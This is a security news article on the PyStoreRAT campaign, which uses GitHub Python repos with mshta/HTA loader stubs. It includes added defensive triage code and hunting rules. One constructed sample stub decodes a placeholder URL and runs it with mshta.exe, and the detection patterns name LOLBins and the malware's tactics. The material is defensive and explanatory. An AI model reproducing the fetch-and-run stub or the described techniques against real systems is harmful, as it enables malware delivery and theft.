Security researchers have identified a campaign that uses GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based remote access trojan (RAT) named PyStoreRAT, according to a report by Morphisec researcher Yonatan Edri.
The repositories are typically presented as development utilities, OSINT tools, DeFi bots or GPT wrappers but contain only small loader stubs that silently download a remote HTML Application (HTA) file and execute it using mshta.exe, initiating the infection chain.
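As an added example (not code from the Morphisec report or from any repository it describes), the following Python script triages a source file for the loader-stub pattern described above: a string literal naming mshta.exe or an .hta resource, a remote URL, and a process-execution call, all in the same file. Both embedded sources are constructed; the base64-wrapped URL is an assumption about how a stub might hide its download location, and example.invalid is a placeholder domain.

```python
"""Static triage of Python files for mshta/HTA loader stubs.

Added example, not Morphisec's tooling. It flags the combination the
report describes (fetch a remote HTA, run it with mshta.exe) rather
than any single indicator, so an OSINT tool that merely talks to an
API is not flagged.
"""
import ast
import base64
import binascii
import re

URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
HTA_RE = re.compile(r"\bmshta(\.exe)?\b|\.hta\b", re.I)
# Dotted calls that hand a command line to the OS, plus bare names for
# `from subprocess import Popen`-style imports (resolution is heuristic).
EXEC_CALLS = {"subprocess.run", "subprocess.call", "subprocess.check_call",
              "subprocess.check_output", "subprocess.Popen",
              "os.system", "os.popen", "os.startfile"}
EXEC_BARE = {"Popen", "system", "popen", "startfile"}


def _dotted(node):
    """Return 'pkg.attr' for a Call.func node, or None if not a plain name."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _maybe_b64(s):
    """Assumption: a stub may hide its URL in a base64 literal; try to decode it."""
    if len(s) < 16 or len(s) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s):
        return None
    try:
        return base64.b64decode(s, validate=True).decode("utf-8", "ignore")
    except (binascii.Error, ValueError):
        return None


def triage_source(src):
    """Return (suspicious, hits). suspicious is True only when an exec call,
    an mshta/.hta reference and a remote URL all appear in the same file."""
    hits = {"exec": [], "mshta_hta": [], "url": []}
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            candidates = [node.value]
            decoded = _maybe_b64(node.value)
            if decoded:
                candidates.append(decoded)
            for s in candidates:
                if HTA_RE.search(s):
                    hits["mshta_hta"].append((node.lineno, s[:60]))
                for url in URL_RE.findall(s):
                    hits["url"].append((node.lineno, url))
        elif isinstance(node, ast.Call):
            fn = _dotted(node.func)
            if fn and (fn in EXEC_CALLS or fn in EXEC_BARE):
                hits["exec"].append((node.lineno, fn))
    suspicious = bool(hits["exec"] and hits["mshta_hta"] and hits["url"])
    return suspicious, hits


# Constructed samples (not real repository contents).
_B64 = base64.b64encode(b"https://example.invalid/update.hta").decode()
STUB = '''
import os, base64
def menu():
    print("1) Scan domain  2) Exit")  # placeholder UI
def _update():
    u = base64.b64decode("''' + _B64 + '''").decode()
    os.system("mshta.exe " + u)
_update()
menu()
'''
BENIGN = '''
import json, urllib.request
def lookup(domain):
    with urllib.request.urlopen("https://example.invalid/api?q=" + domain) as r:
        return json.load(r)
'''

if __name__ == "__main__":
    for name, src in (("stub", STUB), ("benign", BENIGN)):
        flag, found = triage_source(src)
        print(name, "SUSPICIOUS" if flag else "ok", found)
```

The verdict requires all three signals because each alone is common in legitimate code; a reviewer would still open any file that has an mshta or .hta hit, since a stub can fetch the URL from a second file or from the network.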
PyStoreRAT is described as a modular, multi-stage implant able to execute EXE, DLL, PowerShell, MSI, Python, JavaScript and HTA modules and to deploy the Rhadamanthys information stealer. Before proceeding, the loader profiles the host, checks for administrator privileges, scans for cryptocurrency wallet files associated with Ledger Live, Trezor, Exodus, Atomic, Guarda and BitBox02, and enumerates installed antivirus product names, looking for strings such as "Falcon" (as in CrowdStrike Falcon) and "Reason".
Persistence is established via a scheduled task disguised as an NVIDIA app self-update and the implant fetches commands from an external server. Supported actions include downloading and executing EXE payloads (including Rhadamanthys), extracting ZIP archives, loading DLLs with rundll32.exe, fetching and evaluating JavaScript in memory, installing MSI packages, spawning secondary mshta.exe processes, executing PowerShell in memory, spreading via removable drives by replacing documents with malicious shortcut files, and deleting the scheduled task to remove traces.
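The chain in the three paragraphs above gives a hunter several pivots: mshta.exe launched by a Python interpreter or with a remote URL, an NVIDIA-looking scheduled task whose action is a system living-off-the-land binary, rundll32/PowerShell/msiexec children of mshta.exe, and shortcut files written to removable media. The Python rules below are added here and are not part of the Morphisec report; they run over constructed Sysmon-like records in a simplified shape (event type, image, parent, command line, task name and action, file path plus the Win32 drive type). The task name, paths and URLs are assumptions, since the report excerpt gives no exact indicators.

```python
"""Hunting rules for the PyStoreRAT-style chain. Added example; the
event records are constructed and field names are an assumption."""
import ntpath
import re

LOLBINS = {"mshta.exe", "rundll32.exe", "powershell.exe", "pwsh.exe",
           "wscript.exe", "cscript.exe", "msiexec.exe"}
URL_RE = re.compile(r"https?://", re.I)
NVIDIA_NAME_RE = re.compile(r"nvidia|^nv", re.I)
DRIVE_REMOVABLE = 2  # Win32 GetDriveType() value for removable media


def _base(path):
    return ntpath.basename(path or "").lower()


def rule_mshta_remote(ev):
    """R1: mshta.exe spawned by a Python interpreter or given a remote URL.
    Remote-URL mshta is rare in enterprise use; expect few false positives."""
    if ev["type"] != "process" or _base(ev["image"]) != "mshta.exe":
        return None
    from_python = _base(ev["parent"]) in {"python.exe", "pythonw.exe"}
    remote = bool(URL_RE.search(ev["cmdline"]))
    if from_python or remote:
        return ("R1", f"mshta.exe parent={_base(ev['parent'])} remote_url={remote}")
    return None


def rule_fake_nvidia_task(ev):
    """R2: task named like NVIDIA whose action is a LOLBin or is not under
    the vendor's install directory (the discriminator is the action, not the name)."""
    if ev["type"] != "task" or not NVIDIA_NAME_RE.search(ev["name"]):
        return None
    action = ev["action"]
    outside_vendor_dir = "\\nvidia corporation\\" not in action.lower()
    if _base(action) in LOLBINS or outside_vendor_dir:
        return ("R2", f"task '{ev['name']}' runs {action} {ev.get('args', '')}".strip())
    return None


def rule_child_of_mshta(ev):
    """R3: rundll32/PowerShell/msiexec etc. spawned by mshta.exe (DLL, PS, MSI stages)."""
    if ev["type"] != "process" or _base(ev["parent"]) != "mshta.exe":
        return None
    if _base(ev["image"]) in LOLBINS:
        return ("R3", f"{_base(ev['image'])} spawned by mshta.exe: {ev['cmdline']}")
    return None


def rule_lnk_on_removable(ev):
    """R4: shortcut written to removable media that points at a LOLBin
    (document-replacement spread)."""
    if ev["type"] != "file" or ev.get("drive_type") != DRIVE_REMOVABLE:
        return None
    if _base(ev["path"]).endswith(".lnk") and _base(ev.get("target")) in LOLBINS:
        return ("R4", f"shortcut {ev['path']} -> {ev['target']}")
    return None


RULES = (rule_mshta_remote, rule_fake_nvidia_task, rule_child_of_mshta, rule_lnk_on_removable)


def hunt(events):
    """Apply every rule to every event; return the list of (rule_id, detail) hits."""
    findings = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


# Constructed telemetry: five malicious-chain events, then two benign look-alikes.
PY = r"C:\Users\dev\AppData\Local\Programs\Python\Python311\python.exe"
MSHTA = r"C:\Windows\System32\mshta.exe"
EVENTS = [
    {"type": "process", "image": PY, "parent": r"C:\Windows\explorer.exe", "cmdline": "python.exe main.py"},
    {"type": "process", "image": MSHTA, "parent": PY, "cmdline": "mshta.exe https://example.invalid/u.hta"},
    {"type": "task", "name": "NVIDIA App SelfUpdate", "action": MSHTA, "args": "https://example.invalid/u.hta"},
    {"type": "process", "image": r"C:\Windows\System32\rundll32.exe", "parent": MSHTA,
     "cmdline": r"rundll32.exe C:\Users\Public\m.dll,Run"},
    {"type": "file", "path": r"E:\Reports\Q3_budget.lnk", "drive_type": DRIVE_REMOVABLE, "target": MSHTA},
    {"type": "task", "name": "NVIDIA App Update",
     "action": r"C:\Program Files\NVIDIA Corporation\NVIDIA app\NVIDIA app.exe", "args": ""},
    {"type": "process", "image": MSHTA, "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\setup.hta"},
]

if __name__ == "__main__":
    for rule_id, detail in hunt(EVENTS):
        print(rule_id, detail)
```

R2 is the one to tune locally: baseline the real NVIDIA task names and action paths on your fleet first, and watch task deletion events for the same names, since the implant removes its task to cover its tracks.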
The campaign dates to mid-June 2025, with a steady stream of new repositories since then. The threat actors used newly created or long-dormant GitHub accounts, promoted the tools on social media such as YouTube and X, and artificially inflated star and fork counts to lend credibility. Many repositories initially offered only static menus or placeholder functionality; the loader stubs were slipped in later through "maintenance" commits in October and November.
Separately, Chinese security vendor QiAnXin said it has tracked a different RAT called SetcodeRat, likely spread via malvertising since October 2025 and targeting Chinese-speaking regions. That report describes installers that verify system language and a Bilibili URL before proceeding, a sideloading chain that decrypts a DLL from a configuration file, and capabilities that include screenshots, keystroke capture, folder and process access, socket connections and self-updating.